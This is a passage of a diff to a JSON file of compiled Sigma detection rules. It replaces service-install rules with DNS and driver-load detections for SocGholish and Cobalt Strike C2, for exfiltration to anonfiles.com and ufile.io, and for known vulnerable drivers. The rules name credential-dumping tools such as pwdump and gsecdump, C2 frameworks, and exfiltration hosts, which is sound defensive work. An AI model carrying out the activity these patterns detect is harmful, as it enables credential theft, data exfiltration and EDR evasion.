"win_system_susp_dhcp_config_failed.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that 
was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", + "status": "experimental", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND 
EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", - "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "status": "experimental", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", - "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", 
- "attack.t1562" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "status": "test", - "description": "Detects PsExec 
service installation and execution events (service and Sysmon)", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "status": "experimental", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects Obfuscated Powershell via 
use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + 
"attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE '%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE '%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE '%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE '%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd39a86852b498b891672ffbcd071c03%' ESCAPE '\\' OR Hashes LIKE '%MD5=b2a9ac0600b12ec9819e049d7a6a0b75%' ESCAPE '\\' OR Hashes LIKE '%MD5=444f538daa9f7b340cfd43974ed43690%' ESCAPE '\\' OR Hashes LIKE '%MD5=7b43dfd84de5e81162ebcfafb764b769%' ESCAPE '\\' OR Hashes LIKE '%MD5=13dda15ef67eb265869fc371c72d6ef0%' ESCAPE '\\' OR Hashes LIKE '%MD5=300c5b1795c9b6cc1bc4d7d55c7bbe85%' ESCAPE '\\' OR Hashes LIKE '%MD5=1392b92179b07b672720763d9b1028a5%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=2e1f8a2a80221deb93496a861693c565%' ESCAPE '\\' OR Hashes LIKE '%MD5=8065a7659562005127673ac52898675f%' ESCAPE '\\' OR Hashes LIKE '%MD5=b5ada7fd226d20ec6634fc24768f9e22%' ESCAPE '\\' OR Hashes LIKE '%MD5=84fb76ee319073e77fb364bbbbff5461%' ESCAPE '\\' OR Hashes LIKE '%MD5=daf800da15b33bf1a84ee7afc59f0656%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7393fb917aed182e4cbef25ce8af950%' ESCAPE '\\' OR Hashes LIKE '%MD5=120b5bbb9d2eb35ff4f62d79507ea63a%' ESCAPE '\\' OR Hashes LIKE '%MD5=73c98438ac64a68e88b7b0afd11ba140%' ESCAPE '\\' OR Hashes LIKE '%MD5=51207adb8dab983332d6b22c29fe8129%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a23e0f2c6f926a41b28d574cbc6ac30%' ESCAPE '\\' OR Hashes LIKE '%MD5=20125794b807116617d43f02b616e092%' ESCAPE '\\' OR Hashes LIKE '%MD5=e8ebba56ea799e1e62748c59e1a4c586%' ESCAPE '\\' OR Hashes LIKE '%MD5=8abbb12e61045984eda19e2dc77b235e%' ESCAPE '\\' OR Hashes LIKE '%MD5=f66b96aa7ae430b56289409241645099%' ESCAPE '\\' OR Hashes LIKE '%MD5=97e3a44ec4ae58c8cc38eefc613e950e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ff7b31fa6e9ab923bce8af31d1be5bb2%' ESCAPE '\\' OR Hashes LIKE '%MD5=12908c285b9d68ee1f39186110df0f1e%' ESCAPE '\\' OR Hashes LIKE '%MD5=6126065af2fc2639473d12ee3c0c198e%' ESCAPE '\\' OR Hashes LIKE '%MD5=356bda2bf0f6899a2c08b2da3ec69f13%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd7de498a72b2daf89f321d23948c3c4%' ESCAPE '\\' OR Hashes LIKE '%MD5=338a98e1c27bc76f09331fcd7ae413a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=c9a293762319d73c8ee84bcaaf81b7b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9e786bdba458b8b4f9e93d034f73d00%' ESCAPE '\\' OR Hashes LIKE '%MD5=a17c58c0582ee560c72f60764ed63224%' ESCAPE '\\' OR Hashes LIKE '%MD5=21e13f2cb269defeae5e1d09887d47bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=a57b47489febc552515778dd0fd1e51c%' ESCAPE '\\' OR Hashes LIKE '%MD5=d6e9f6c67d9b3d790d592557a7d57c3c%' ESCAPE '\\' OR Hashes LIKE '%MD5=76bb1a4332666222a8e3e1339e267179%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cd158a64f3d886357535382a6fdad75%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=d9e7e5bcc5b01915dbcef7762a7fc329%' ESCAPE '\\' OR Hashes LIKE '%MD5=d253c19194a18030296ae62a10821640%' ESCAPE '\\' OR Hashes LIKE '%MD5=b12d1630fd50b2a21fd91e45d522ba3a%' ESCAPE '\\' OR Hashes LIKE '%MD5=50b39072d0ee9af5ef4824eca34be6e3%' ESCAPE '\\' OR Hashes LIKE '%MD5=778b7feea3c750d44745d3bf294bd4ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=0761c357aed5f591142edaefdf0c89c8%' ESCAPE '\\' OR Hashes LIKE '%MD5=23cf3da010497eb2bf39a5c5a57e437c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c49a1956a6a25ffc25ad97d6762b0989%' ESCAPE '\\' OR Hashes LIKE '%MD5=f406c5536bcf9bacbeb7ce8a3c383bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=f2f728d2f69765f5dfda913d407783d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b817d0e7714b9d43db43ae4a22a161e%' ESCAPE '\\' OR Hashes LIKE '%MD5=715f8efab1d1c660e4188055c4b28eed%' ESCAPE '\\' OR Hashes LIKE '%MD5=a01c412699b6f21645b2885c2bae4454%' ESCAPE '\\' OR Hashes LIKE '%MD5=010c0e5ac584e3ab97a2daf84cf436f5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5db81974ffda566fa821400419f59be%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014ba35d406475311a2eab0c4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d487f77be4471900d6ccbc47242cc25%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f2888e57fdd6aee466962c25ba7d62d%' ESCAPE '\\' OR Hashes LIKE '%MD5=507a649eb585d8d0447eab0532ef0c73%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11%' ESCAPE '\\' OR Hashes LIKE '%MD5=cd9f0fcecf1664facb3671c0130dc8bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=b10b210c5944965d0dc85e70a0b19a42%' ESCAPE '\\' OR Hashes LIKE '%MD5=ae5eb2759305402821aeddc52ba9a6d6%' ESCAPE '\\' OR Hashes LIKE '%MD5=f5051c756035ef5de9c4c48bacb0612b%' ESCAPE '\\' OR Hashes LIKE '%MD5=1898ceda3247213c084f43637ef163b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=37086ae5244442ba552803984a11d6cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=825703c494e0d270f797f1ecf070f698%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\' OR Hashes LIKE '%MD5=75d6c3469347de1cdfa3b1b9f1544208%' ESCAPE '\\' OR Hashes LIKE 
